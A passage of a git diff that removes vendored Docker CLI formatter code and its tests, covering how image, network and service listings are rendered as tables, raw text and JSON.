append(image.RepoTags) { - ref, err := reference.ParseNamed(refString) - if err != nil { - continue - } - if nt, ok := ref.(reference.NamedTagged); ok { 
- repoTags[ref.Name()] = append(repoTags[ref.Name()], nt.Tag()) - } - } - for _, refString := range append(image.RepoDigests) { - ref, err := reference.ParseNamed(refString) - if err != nil { - continue - } - if c, ok := ref.(reference.Canonical); ok { - repoDigests[ref.Name()] = append(repoDigests[ref.Name()], c.Digest().String()) - } - } - - for repo, tags := range repoTags { - digests := repoDigests[repo] - - // Do not display digests as their own row - delete(repoDigests, repo) - - if !ctx.Digest { - // Ignore digest references, just show tag once - digests = nil - } - - for _, tag := range tags { - if len(digests) == 0 { - images = append(images, &imageContext{ - trunc: ctx.Trunc, - i: image, - repo: repo, - tag: tag, - digest: "", - }) - continue - } - // Display the digests for each tag - for _, dgst := range digests { - images = append(images, &imageContext{ - trunc: ctx.Trunc, - i: image, - repo: repo, - tag: tag, - digest: dgst, - }) - } - - } - } - - // Show rows for remaining digest only references - for repo, digests := range repoDigests { - // If digests are displayed, show row per digest - if ctx.Digest { - for _, dgst := range digests { - images = append(images, &imageContext{ - trunc: ctx.Trunc, - i: image, - repo: repo, - tag: "", - digest: dgst, - }) - } - } else { - images = append(images, &imageContext{ - trunc: ctx.Trunc, - i: image, - repo: repo, - tag: "", - }) - } - } - } - for _, imageCtx := range images { - if err := format(imageCtx); err != nil { - return err - } - } - } - return nil -} - -type imageContext struct { - HeaderContext - trunc bool - i types.ImageSummary - repo string - tag string - digest string -} - -func (c *imageContext) ID() string { - c.AddHeader(imageIDHeader) - if c.trunc { - return stringid.TruncateID(c.i.ID) - } - return c.i.ID -} - -func (c *imageContext) Repository() string { - c.AddHeader(repositoryHeader) - return c.repo -} - -func (c *imageContext) Tag() string { - c.AddHeader(tagHeader) - return c.tag -} - 
-func (c *imageContext) Digest() string { - c.AddHeader(digestHeader) - return c.digest -} - -func (c *imageContext) CreatedSince() string { - c.AddHeader(createdSinceHeader) - createdAt := time.Unix(int64(c.i.Created), 0) - return units.HumanDuration(time.Now().UTC().Sub(createdAt)) -} - -func (c *imageContext) CreatedAt() string { - c.AddHeader(createdAtHeader) - return time.Unix(int64(c.i.Created), 0).String() -} - -func (c *imageContext) Size() string { - c.AddHeader(sizeHeader) - return units.HumanSizeWithPrecision(float64(c.i.Size), 3) -} - -func (c *imageContext) Containers() string { - c.AddHeader(containersHeader) - if c.i.Containers == -1 { - return "N/A" - } - return fmt.Sprintf("%d", c.i.Containers) -} - -func (c *imageContext) VirtualSize() string { - c.AddHeader(sizeHeader) - return units.HumanSize(float64(c.i.VirtualSize)) -} - -func (c *imageContext) SharedSize() string { - c.AddHeader(sharedSizeHeader) - if c.i.SharedSize == -1 { - return "N/A" - } - return units.HumanSize(float64(c.i.SharedSize)) -} - -func (c *imageContext) UniqueSize() string { - c.AddHeader(uniqueSizeHeader) - if c.i.VirtualSize == -1 || c.i.SharedSize == -1 { - return "N/A" - } - return units.HumanSize(float64(c.i.VirtualSize - c.i.SharedSize)) -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/image_test.go b/vendor/github.com/docker/docker/cli/command/formatter/image_test.go deleted file mode 100644 index ffe77f6677..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/image_test.go +++ /dev/null @@ -1,333 +0,0 @@ -package formatter - -import ( - "bytes" - "fmt" - "strings" - "testing" - "time" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestImageContext(t *testing.T) { - imageID := stringid.GenerateRandomID() - unix := time.Now().Unix() - - var ctx imageContext - cases := []struct { - imageCtx imageContext - expValue string - expHeader 
string - call func() string - }{ - {imageContext{ - i: types.ImageSummary{ID: imageID}, - trunc: true, - }, stringid.TruncateID(imageID), imageIDHeader, ctx.ID}, - {imageContext{ - i: types.ImageSummary{ID: imageID}, - trunc: false, - }, imageID, imageIDHeader, ctx.ID}, - {imageContext{ - i: types.ImageSummary{Size: 10, VirtualSize: 10}, - trunc: true, - }, "10 B", sizeHeader, ctx.Size}, - {imageContext{ - i: types.ImageSummary{Created: unix}, - trunc: true, - }, time.Unix(unix, 0).String(), createdAtHeader, ctx.CreatedAt}, - // FIXME - // {imageContext{ - // i: types.ImageSummary{Created: unix}, - // trunc: true, - // }, units.HumanDuration(time.Unix(unix, 0)), createdSinceHeader, ctx.CreatedSince}, - {imageContext{ - i: types.ImageSummary{}, - repo: "busybox", - }, "busybox", repositoryHeader, ctx.Repository}, - {imageContext{ - i: types.ImageSummary{}, - tag: "latest", - }, "latest", tagHeader, ctx.Tag}, - {imageContext{ - i: types.ImageSummary{}, - digest: "sha256:d149ab53f8718e987c3a3024bb8aa0e2caadf6c0328f1d9d850b2a2a67f2819a", - }, "sha256:d149ab53f8718e987c3a3024bb8aa0e2caadf6c0328f1d9d850b2a2a67f2819a", digestHeader, ctx.Digest}, - } - - for _, c := range cases { - ctx = c.imageCtx - v := c.call() - if strings.Contains(v, ",") { - compareMultipleValues(t, v, c.expValue) - } else if v != c.expValue { - t.Fatalf("Expected %s, was %s\n", c.expValue, v) - } - - h := ctx.FullHeader() - if h != c.expHeader { - t.Fatalf("Expected %s, was %s\n", c.expHeader, h) - } - } -} - -func TestImageContextWrite(t *testing.T) { - unixTime := time.Now().AddDate(0, 0, -1).Unix() - expectedTime := time.Unix(unixTime, 0).String() - - cases := []struct { - context ImageContext - expected string - }{ - // Errors - { - ImageContext{ - Context: Context{ - Format: "{{InvalidFunction}}", - }, - }, - `Template parsing error: template: :1: function "InvalidFunction" not defined -`, - }, - { - ImageContext{ - Context: Context{ - Format: "{{nil}}", - }, - }, - `Template parsing error: 
template: :1:2: executing "" at : nil is not a command -`, - }, - // Table Format - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table", false, false), - }, - }, - `REPOSITORY TAG IMAGE ID CREATED SIZE -image tag1 imageID1 24 hours ago 0 B -image tag2 imageID2 24 hours ago 0 B - imageID3 24 hours ago 0 B -`, - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table {{.Repository}}", false, false), - }, - }, - "REPOSITORY\nimage\nimage\n\n", - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table {{.Repository}}", false, true), - }, - Digest: true, - }, - `REPOSITORY DIGEST -image sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf -image - -`, - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table {{.Repository}}", true, false), - }, - }, - "REPOSITORY\nimage\nimage\n\n", - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table", true, false), - }, - }, - "imageID1\nimageID2\nimageID3\n", - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table", false, true), - }, - Digest: true, - }, - `REPOSITORY TAG DIGEST IMAGE ID CREATED SIZE -image tag1 sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf imageID1 24 hours ago 0 B -image tag2 imageID2 24 hours ago 0 B - imageID3 24 hours ago 0 B -`, - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table", true, true), - }, - Digest: true, - }, - "imageID1\nimageID2\nimageID3\n", - }, - // Raw Format - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("raw", false, false), - }, - }, - fmt.Sprintf(`repository: image -tag: tag1 -image_id: imageID1 -created_at: %s -virtual_size: 0 B - -repository: image -tag: tag2 -image_id: imageID2 -created_at: %s -virtual_size: 0 B - -repository: -tag: -image_id: imageID3 -created_at: %s -virtual_size: 0 B - -`, expectedTime, expectedTime, expectedTime), - }, - { - ImageContext{ - Context: Context{ - 
Format: NewImageFormat("raw", false, true), - }, - Digest: true, - }, - fmt.Sprintf(`repository: image -tag: tag1 -digest: sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf -image_id: imageID1 -created_at: %s -virtual_size: 0 B - -repository: image -tag: tag2 -digest: -image_id: imageID2 -created_at: %s -virtual_size: 0 B - -repository: -tag: -digest: -image_id: imageID3 -created_at: %s -virtual_size: 0 B - -`, expectedTime, expectedTime, expectedTime), - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("raw", true, false), - }, - }, - `image_id: imageID1 -image_id: imageID2 -image_id: imageID3 -`, - }, - // Custom Format - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("{{.Repository}}", false, false), - }, - }, - "image\nimage\n\n", - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("{{.Repository}}", false, true), - }, - Digest: true, - }, - "image\nimage\n\n", - }, - } - - for _, testcase := range cases { - images := []types.ImageSummary{ - {ID: "imageID1", RepoTags: []string{"image:tag1"}, RepoDigests: []string{"image@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"}, Created: unixTime}, - {ID: "imageID2", RepoTags: []string{"image:tag2"}, Created: unixTime}, - {ID: "imageID3", RepoTags: []string{":"}, RepoDigests: []string{"@"}, Created: unixTime}, - } - out := bytes.NewBufferString("") - testcase.context.Output = out - err := ImageWrite(testcase.context, images) - if err != nil { - assert.Error(t, err, testcase.expected) - } else { - assert.Equal(t, out.String(), testcase.expected) - } - } -} - -func TestImageContextWriteWithNoImage(t *testing.T) { - out := bytes.NewBufferString("") - images := []types.ImageSummary{} - - contexts := []struct { - context ImageContext - expected string - }{ - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("{{.Repository}}", false, false), - Output: out, - }, - }, - "", - }, - { - ImageContext{ - Context: Context{ 
- Format: NewImageFormat("table {{.Repository}}", false, false), - Output: out, - }, - }, - "REPOSITORY\n", - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("{{.Repository}}", false, true), - Output: out, - }, - }, - "", - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table {{.Repository}}", false, true), - Output: out, - }, - }, - "REPOSITORY DIGEST\n", - }, - } - - for _, context := range contexts { - ImageWrite(context.context, images) - assert.Equal(t, out.String(), context.expected) - // Clean buffer - out.Reset() - } -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/network.go b/vendor/github.com/docker/docker/cli/command/formatter/network.go deleted file mode 100644 index 7fbad7d2ab..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/network.go +++ /dev/null @@ -1,117 +0,0 @@ -package formatter - -import ( - "fmt" - "strings" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/stringid" -) - -const ( - defaultNetworkTableFormat = "table {{.ID}}\t{{.Name}}\t{{.Driver}}\t{{.Scope}}" - - networkIDHeader = "NETWORK ID" - ipv6Header = "IPV6" - internalHeader = "INTERNAL" -) - -// NewNetworkFormat returns a Format for rendering using a network Context -func NewNetworkFormat(source string, quiet bool) Format { - switch source { - case TableFormatKey: - if quiet { - return defaultQuietFormat - } - return defaultNetworkTableFormat - case RawFormatKey: - if quiet { - return `network_id: {{.ID}}` - } - return `network_id: {{.ID}}\nname: {{.Name}}\ndriver: {{.Driver}}\nscope: {{.Scope}}\n` - } - return Format(source) -} - -// NetworkWrite writes the context -func NetworkWrite(ctx Context, networks []types.NetworkResource) error { - render := func(format func(subContext subContext) error) error { - for _, network := range networks { - networkCtx := &networkContext{trunc: ctx.Trunc, n: network} - if err := format(networkCtx); err != nil { - return err - } - } - return 
nil - } - return ctx.Write(&networkContext{}, render) -} - -type networkContext struct { - HeaderContext - trunc bool - n types.NetworkResource -} - -func (c *networkContext) MarshalJSON() ([]byte, error) { - return marshalJSON(c) -} - -func (c *networkContext) ID() string { - c.AddHeader(networkIDHeader) - if c.trunc { - return stringid.TruncateID(c.n.ID) - } - return c.n.ID -} - -func (c *networkContext) Name() string { - c.AddHeader(nameHeader) - return c.n.Name -} - -func (c *networkContext) Driver() string { - c.AddHeader(driverHeader) - return c.n.Driver -} - -func (c *networkContext) Scope() string { - c.AddHeader(scopeHeader) - return c.n.Scope -} - -func (c *networkContext) IPv6() string { - c.AddHeader(ipv6Header) - return fmt.Sprintf("%v", c.n.EnableIPv6) -} - -func (c *networkContext) Internal() string { - c.AddHeader(internalHeader) - return fmt.Sprintf("%v", c.n.Internal) -} - -func (c *networkContext) Labels() string { - c.AddHeader(labelsHeader) - if c.n.Labels == nil { - return "" - } - - var joinLabels []string - for k, v := range c.n.Labels { - joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v)) - } - return strings.Join(joinLabels, ",") -} - -func (c *networkContext) Label(name string) string { - n := strings.Split(name, ".") - r := strings.NewReplacer("-", " ", "_", " ") - h := r.Replace(n[len(n)-1]) - - c.AddHeader(h) - - if c.n.Labels == nil { - return "" - } - return c.n.Labels[name] -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/network_test.go b/vendor/github.com/docker/docker/cli/command/formatter/network_test.go deleted file mode 100644 index b40a534eed..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/network_test.go +++ /dev/null @@ -1,208 +0,0 @@ -package formatter - -import ( - "bytes" - "encoding/json" - "strings" - "testing" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/testutil/assert" -) - -func 
TestNetworkContext(t *testing.T) { - networkID := stringid.GenerateRandomID() - - var ctx networkContext - cases := []struct { - networkCtx networkContext - expValue string - expHeader string - call func() string - }{ - {networkContext{ - n: types.NetworkResource{ID: networkID}, - trunc: false, - }, networkID, networkIDHeader, ctx.ID}, - {networkContext{ - n: types.NetworkResource{ID: networkID}, - trunc: true, - }, stringid.TruncateID(networkID), networkIDHeader, ctx.ID}, - {networkContext{ - n: types.NetworkResource{Name: "network_name"}, - }, "network_name", nameHeader, ctx.Name}, - {networkContext{ - n: types.NetworkResource{Driver: "driver_name"}, - }, "driver_name", driverHeader, ctx.Driver}, - {networkContext{ - n: types.NetworkResource{EnableIPv6: true}, - }, "true", ipv6Header, ctx.IPv6}, - {networkContext{ - n: types.NetworkResource{EnableIPv6: false}, - }, "false", ipv6Header, ctx.IPv6}, - {networkContext{ - n: types.NetworkResource{Internal: true}, - }, "true", internalHeader, ctx.Internal}, - {networkContext{ - n: types.NetworkResource{Internal: false}, - }, "false", internalHeader, ctx.Internal}, - {networkContext{ - n: types.NetworkResource{}, - }, "", labelsHeader, ctx.Labels}, - {networkContext{ - n: types.NetworkResource{Labels: map[string]string{"label1": "value1", "label2": "value2"}}, - }, "label1=value1,label2=value2", labelsHeader, ctx.Labels}, - } - - for _, c := range cases { - ctx = c.networkCtx - v := c.call() - if strings.Contains(v, ",") { - compareMultipleValues(t, v, c.expValue) - } else if v != c.expValue { - t.Fatalf("Expected %s, was %s\n", c.expValue, v) - } - - h := ctx.FullHeader() - if h != c.expHeader { - t.Fatalf("Expected %s, was %s\n", c.expHeader, h) - } - } -} - -func TestNetworkContextWrite(t *testing.T) { - cases := []struct { - context Context - expected string - }{ - - // Errors - { - Context{Format: "{{InvalidFunction}}"}, - `Template parsing error: template: :1: function "InvalidFunction" not defined -`, - }, - { - 
Context{Format: "{{nil}}"}, - `Template parsing error: template: :1:2: executing "" at : nil is not a command -`, - }, - // Table format - { - Context{Format: NewNetworkFormat("table", false)}, - `NETWORK ID NAME DRIVER SCOPE -networkID1 foobar_baz foo local -networkID2 foobar_bar bar local -`, - }, - { - Context{Format: NewNetworkFormat("table", true)}, - `networkID1 -networkID2 -`, - }, - { - Context{Format: NewNetworkFormat("table {{.Name}}", false)}, - `NAME -foobar_baz -foobar_bar -`, - }, - { - Context{Format: NewNetworkFormat("table {{.Name}}", true)}, - `NAME -foobar_baz -foobar_bar -`, - }, - // Raw Format - { - Context{Format: NewNetworkFormat("raw", false)}, - `network_id: networkID1 -name: foobar_baz -driver: foo -scope: local - -network_id: networkID2 -name: foobar_bar -driver: bar -scope: local - -`, - }, - { - Context{Format: NewNetworkFormat("raw", true)}, - `network_id: networkID1 -network_id: networkID2 -`, - }, - // Custom Format - { - Context{Format: NewNetworkFormat("{{.Name}}", false)}, - `foobar_baz -foobar_bar -`, - }, - } - - for _, testcase := range cases { - networks := []types.NetworkResource{ - {ID: "networkID1", Name: "foobar_baz", Driver: "foo", Scope: "local"}, - {ID: "networkID2", Name: "foobar_bar", Driver: "bar", Scope: "local"}, - } - out := bytes.NewBufferString("") - testcase.context.Output = out - err := NetworkWrite(testcase.context, networks) - if err != nil { - assert.Error(t, err, testcase.expected) - } else { - assert.Equal(t, out.String(), testcase.expected) - } - } -} - -func TestNetworkContextWriteJSON(t *testing.T) { - networks := []types.NetworkResource{ - {ID: "networkID1", Name: "foobar_baz"}, - {ID: "networkID2", Name: "foobar_bar"}, - } - expectedJSONs := []map[string]interface{}{ - {"Driver": "", "ID": "networkID1", "IPv6": "false", "Internal": "false", "Labels": "", "Name": "foobar_baz", "Scope": ""}, - {"Driver": "", "ID": "networkID2", "IPv6": "false", "Internal": "false", "Labels": "", "Name": "foobar_bar", 
"Scope": ""}, - } - - out := bytes.NewBufferString("") - err := NetworkWrite(Context{Format: "{{json .}}", Output: out}, networks) - if err != nil { - t.Fatal(err) - } - for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { - t.Logf("Output: line %d: %s", i, line) - var m map[string]interface{} - if err := json.Unmarshal([]byte(line), &m); err != nil { - t.Fatal(err) - } - assert.DeepEqual(t, m, expectedJSONs[i]) - } -} - -func TestNetworkContextWriteJSONField(t *testing.T) { - networks := []types.NetworkResource{ - {ID: "networkID1", Name: "foobar_baz"}, - {ID: "networkID2", Name: "foobar_bar"}, - } - out := bytes.NewBufferString("") - err := NetworkWrite(Context{Format: "{{json .ID}}", Output: out}, networks) - if err != nil { - t.Fatal(err) - } - for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { - t.Logf("Output: line %d: %s", i, line) - var s string - if err := json.Unmarshal([]byte(line), &s); err != nil { - t.Fatal(err) - } - assert.Equal(t, s, networks[i].ID) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/reflect.go b/vendor/github.com/docker/docker/cli/command/formatter/reflect.go deleted file mode 100644 index d1d8737d21..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/reflect.go +++ /dev/null @@ -1,65 +0,0 @@ -package formatter - -import ( - "encoding/json" - "fmt" - "reflect" - "unicode" -) - -func marshalJSON(x interface{}) ([]byte, error) { - m, err := marshalMap(x) - if err != nil { - return nil, err - } - return json.Marshal(m) -} - -// marshalMap marshals x to map[string]interface{} -func marshalMap(x interface{}) (map[string]interface{}, error) { - val := reflect.ValueOf(x) - if val.Kind() != reflect.Ptr { - return nil, fmt.Errorf("expected a pointer to a struct, got %v", val.Kind()) - } - if val.IsNil() { - return nil, fmt.Errorf("expxected a pointer to a struct, got nil pointer") - } - valElem := val.Elem() - if valElem.Kind() != reflect.Struct { - 
return nil, fmt.Errorf("expected a pointer to a struct, got a pointer to %v", valElem.Kind()) - } - typ := val.Type() - m := make(map[string]interface{}) - for i := 0; i < val.NumMethod(); i++ { - k, v, err := marshalForMethod(typ.Method(i), val.Method(i)) - if err != nil { - return nil, err - } - if k != "" { - m[k] = v - } - } - return m, nil -} - -var unmarshallableNames = map[string]struct{}{"FullHeader": {}} - -// marshalForMethod returns the map key and the map value for marshalling the method. -// It returns ("", nil, nil) for valid but non-marshallable parameter. (e.g. "unexportedFunc()") -func marshalForMethod(typ reflect.Method, val reflect.Value) (string, interface{}, error) { - if val.Kind() != reflect.Func { - return "", nil, fmt.Errorf("expected func, got %v", val.Kind()) - } - name, numIn, numOut := typ.Name, val.Type().NumIn(), val.Type().NumOut() - _, blackListed := unmarshallableNames[name] - // FIXME: In text/template, (numOut == 2) is marshallable, - // if the type of the second param is error. 
- marshallable := unicode.IsUpper(rune(name[0])) && !blackListed && - numIn == 0 && numOut == 1 - if !marshallable { - return "", nil, nil - } - result := val.Call(make([]reflect.Value, numIn)) - intf := result[0].Interface() - return name, intf, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go b/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go deleted file mode 100644 index e547b18411..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go +++ /dev/null @@ -1,66 +0,0 @@ -package formatter - -import ( - "reflect" - "testing" -) - -type dummy struct { -} - -func (d *dummy) Func1() string { - return "Func1" -} - -func (d *dummy) func2() string { - return "func2(should not be marshalled)" -} - -func (d *dummy) Func3() (string, int) { - return "Func3(should not be marshalled)", -42 -} - -func (d *dummy) Func4() int { - return 4 -} - -type dummyType string - -func (d *dummy) Func5() dummyType { - return dummyType("Func5") -} - -func (d *dummy) FullHeader() string { - return "FullHeader(should not be marshalled)" -} - -var dummyExpected = map[string]interface{}{ - "Func1": "Func1", - "Func4": 4, - "Func5": dummyType("Func5"), -} - -func TestMarshalMap(t *testing.T) { - d := dummy{} - m, err := marshalMap(&d) - if err != nil { - t.Fatal(err) - } - if !reflect.DeepEqual(dummyExpected, m) { - t.Fatalf("expected %+v, got %+v", - dummyExpected, m) - } -} - -func TestMarshalMapBad(t *testing.T) { - if _, err := marshalMap(nil); err == nil { - t.Fatal("expected an error (argument is nil)") - } - if _, err := marshalMap(dummy{}); err == nil { - t.Fatal("expected an error (argument is non-pointer)") - } - x := 42 - if _, err := marshalMap(&x); err == nil { - t.Fatal("expected an error (argument is a pointer to non-struct)") - } -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/service.go b/vendor/github.com/docker/docker/cli/command/formatter/service.go deleted file 
mode 100644 index aaa78386cb..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/service.go +++ /dev/null @@ -1,322 +0,0 @@ -package formatter - -import ( - "fmt" - "strings" - "time" - - mounttypes "github.com/docker/docker/api/types/mount" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli/command/inspect" - units "github.com/docker/go-units" -) - -const serviceInspectPrettyTemplate Format = ` -ID: {{.ID}} -Name: {{.Name}} -{{- if .Labels }} -Labels: -{{- range $k, $v := .Labels }} - {{ $k }}{{if $v }}={{ $v }}{{ end }} -{{- end }}{{ end }} -Service Mode: -{{- if .IsModeGlobal }} Global -{{- else if .IsModeReplicated }} Replicated -{{- if .ModeReplicatedReplicas }} - Replicas: {{ .ModeReplicatedReplicas }} -{{- end }}{{ end }} -{{- if .HasUpdateStatus }} -UpdateStatus: - State: {{ .UpdateStatusState }} - Started: {{ .UpdateStatusStarted }} -{{- if .UpdateIsCompleted }} - Completed: {{ .UpdateStatusCompleted }} -{{- end }} - Message: {{ .UpdateStatusMessage }} -{{- end }} -Placement: -{{- if .TaskPlacementConstraints -}} - Contraints: {{ .TaskPlacementConstraints }} -{{- end }} -{{- if .HasUpdateConfig }} -UpdateConfig: - Parallelism: {{ .UpdateParallelism }} -{{- if .HasUpdateDelay}} - Delay: {{ .UpdateDelay }} -{{- end }} - On failure: {{ .UpdateOnFailure }} -{{- if .HasUpdateMonitor}} - Monitoring Period: {{ .UpdateMonitor }} -{{- end }} - Max failure ratio: {{ .UpdateMaxFailureRatio }} -{{- end }} -ContainerSpec: - Image: {{ .ContainerImage }} -{{- if .ContainerArgs }} - Args: {{ range $arg := .ContainerArgs }}{{ $arg }} {{ end }} -{{- end -}} -{{- if .ContainerEnv }} - Env: {{ range $env := .ContainerEnv }}{{ $env }} {{ end }} -{{- end -}} -{{- if .ContainerWorkDir }} - Dir: {{ .ContainerWorkDir }} -{{- end -}} -{{- if .ContainerUser }} - User: {{ .ContainerUser }} -{{- end }} -{{- if .ContainerMounts }} -Mounts: -{{- end }} -{{- range $mount := .ContainerMounts }} - Target = {{ $mount.Target }} - Source = {{ 
$mount.Source }} - ReadOnly = {{ $mount.ReadOnly }} - Type = {{ $mount.Type }} -{{- end -}} -{{- if .HasResources }} -Resources: -{{- if .HasResourceReservations }} - Reservations: -{{- if gt .ResourceReservationNanoCPUs 0.0 }} - CPU: {{ .ResourceReservationNanoCPUs }} -{{- end }} -{{- if .ResourceReservationMemory }} - Memory: {{ .ResourceReservationMemory }} -{{- end }}{{ end }} -{{- if .HasResourceLimits }} - Limits: -{{- if gt .ResourceLimitsNanoCPUs 0.0 }} - CPU: {{ .ResourceLimitsNanoCPUs }} -{{- end }} -{{- if .ResourceLimitMemory }} - Memory: {{ .ResourceLimitMemory }} -{{- end }}{{ end }}{{ end }} -{{- if .Networks }} -Networks: -{{- range $network := .Networks }} {{ $network }}{{ end }} {{ end }} -Endpoint Mode: {{ .EndpointMode }} -{{- if .Ports }} -Ports: -{{- range $port := .Ports }} - PublishedPort {{ $port.PublishedPort }} - Protocol = {{ $port.Protocol }} - TargetPort = {{ $port.TargetPort }} -{{- end }} {{ end -}} -` - -// NewServiceFormat returns a Format for rendering using a Context -func NewServiceFormat(source string) Format { - switch source { - case PrettyFormatKey: - return serviceInspectPrettyTemplate - default: - return Format(strings.TrimPrefix(source, RawFormatKey)) - } -} - -// ServiceInspectWrite renders the context for a list of services -func ServiceInspectWrite(ctx Context, refs []string, getRef inspect.GetRefFunc) error { - if ctx.Format != serviceInspectPrettyTemplate { - return inspect.Inspect(ctx.Output, refs, string(ctx.Format), getRef) - } - render := func(format func(subContext subContext) error) error { - for _, ref := range refs { - serviceI, _, err := getRef(ref) - if err != nil { - return err - } - service, ok := serviceI.(swarm.Service) - if !ok { - return fmt.Errorf("got wrong object to inspect") - } - if err := format(&serviceInspectContext{Service: service}); err != nil { - return err - } - } - return nil - } - return ctx.Write(&serviceInspectContext{}, render) -} - -type serviceInspectContext struct { - 
swarm.Service - subContext -} - -func (ctx *serviceInspectContext) MarshalJSON() ([]byte, error) { - return marshalJSON(ctx) -} - -func (ctx *serviceInspectContext) ID() string { - return ctx.Service.ID -} - -func (ctx *serviceInspectContext) Name() string { - return ctx.Service.Spec.Name -} - -func (ctx *serviceInspectContext) Labels() map[string]string { - return ctx.Service.Spec.Labels -} - -func (ctx *serviceInspectContext) IsModeGlobal() bool { - return ctx.Service.Spec.Mode.Global != nil -} - -func (ctx *serviceInspectContext) IsModeReplicated() bool { - return ctx.Service.Spec.Mode.Replicated != nil -} - -func (ctx *serviceInspectContext) ModeReplicatedReplicas() *uint64 { - return ctx.Service.Spec.Mode.Replicated.Replicas -} - -func (ctx *serviceInspectContext) HasUpdateStatus() bool { - return ctx.Service.UpdateStatus.State != "" -} - -func (ctx *serviceInspectContext) UpdateStatusState() swarm.UpdateState { - return ctx.Service.UpdateStatus.State -} - -func (ctx *serviceInspectContext) UpdateStatusStarted() string { - return units.HumanDuration(time.Since(ctx.Service.UpdateStatus.StartedAt)) -} - -func (ctx *serviceInspectContext) UpdateIsCompleted() bool { - return ctx.Service.UpdateStatus.State == swarm.UpdateStateCompleted -} - -func (ctx *serviceInspectContext) UpdateStatusCompleted() string { - return units.HumanDuration(time.Since(ctx.Service.UpdateStatus.CompletedAt)) -} - -func (ctx *serviceInspectContext) UpdateStatusMessage() string { - return ctx.Service.UpdateStatus.Message -} - -func (ctx *serviceInspectContext) TaskPlacementConstraints() []string { - if ctx.Service.Spec.TaskTemplate.Placement != nil { - return ctx.Service.Spec.TaskTemplate.Placement.Constraints - } - return nil -} - -func (ctx *serviceInspectContext) HasUpdateConfig() bool { - return ctx.Service.Spec.UpdateConfig != nil -} - -func (ctx *serviceInspectContext) UpdateParallelism() uint64 { - return ctx.Service.Spec.UpdateConfig.Parallelism -} - -func (ctx 
*serviceInspectContext) HasUpdateDelay() bool { - return ctx.Service.Spec.UpdateConfig.Delay.Nanoseconds() > 0 -} - -func (ctx *serviceInspectContext) UpdateDelay() time.Duration { - return ctx.Service.Spec.UpdateConfig.Delay -} - -func (ctx *serviceInspectContext) UpdateOnFailure() string { - return ctx.Service.Spec.UpdateConfig.FailureAction -} - -func (ctx *serviceInspectContext) HasUpdateMonitor() bool { - return ctx.Service.Spec.UpdateConfig.Monitor.Nanoseconds() > 0 -} - -func (ctx *serviceInspectContext) UpdateMonitor() time.Duration { - return ctx.Service.Spec.UpdateConfig.Monitor -} - -func (ctx *serviceInspectContext) UpdateMaxFailureRatio() float32 { - return ctx.Service.Spec.UpdateConfig.MaxFailureRatio -} - -func (ctx *serviceInspectContext) ContainerImage() string { - return ctx.Service.Spec.TaskTemplate.ContainerSpec.Image -} - -func (ctx *serviceInspectContext) ContainerArgs() []string { - return ctx.Service.Spec.TaskTemplate.ContainerSpec.Args -} - -func (ctx *serviceInspectContext) ContainerEnv() []string { - return ctx.Service.Spec.TaskTemplate.ContainerSpec.Env -} - -func (ctx *serviceInspectContext) ContainerWorkDir() string { - return ctx.Service.Spec.TaskTemplate.ContainerSpec.Dir -} - -func (ctx *serviceInspectContext) ContainerUser() string { - return ctx.Service.Spec.TaskTemplate.ContainerSpec.User -} - -func (ctx *serviceInspectContext) ContainerMounts() []mounttypes.Mount { - return ctx.Service.Spec.TaskTemplate.ContainerSpec.Mounts -} - -func (ctx *serviceInspectContext) HasResources() bool { - return ctx.Service.Spec.TaskTemplate.Resources != nil -} - -func (ctx *serviceInspectContext) HasResourceReservations() bool { - if ctx.Service.Spec.TaskTemplate.Resources == nil || ctx.Service.Spec.TaskTemplate.Resources.Reservations == nil { - return false - } - return ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs > 0 || ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes > 0 -} - -func (ctx *serviceInspectContext) 
